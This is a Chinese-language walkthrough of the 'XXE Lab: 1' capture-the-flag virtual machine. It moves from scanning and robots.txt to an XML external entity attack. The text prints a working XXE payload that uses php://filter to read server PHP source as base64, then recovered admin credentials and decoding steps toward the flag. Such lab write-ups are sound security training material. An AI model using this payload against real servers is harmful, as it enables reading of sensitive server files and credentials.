文章目录
靶机文档:XXE Lab: 1
下载地址:Download (Mirror)
告诉了利用点:http://your-ip/xxe
信息收集
主机发现
端口扫描
目录扫描
访问robots.txt
访问/xxe
随意输入账密,登陆抓包
看到登陆的格式就是XML
语言的数据格式
漏洞利用
payload:
xml
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=xxe.php">
]>
<root><name>&admin;</name><password>hj</password></root>
将选中base64
格式的数据,发送到Decoder
模块,去解码
刚才robots.txt
文件里还显示有一个admin.php
,尝试读取一下
解码发现了用户名和密码
用户名:administhebest
密码解密后是admin@123
还发现了/flagmoout.php
先用得到的账密进行登陆
也跳转到了/flagmeout.php
base64
解码后得到一串base32格式
的数据
JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5
解码后得到base64
格式的
再进行base64
解码,得到一个路径,再次外部实体注入
运行需要php版本较低 ,高版本会报错,导致出不来结果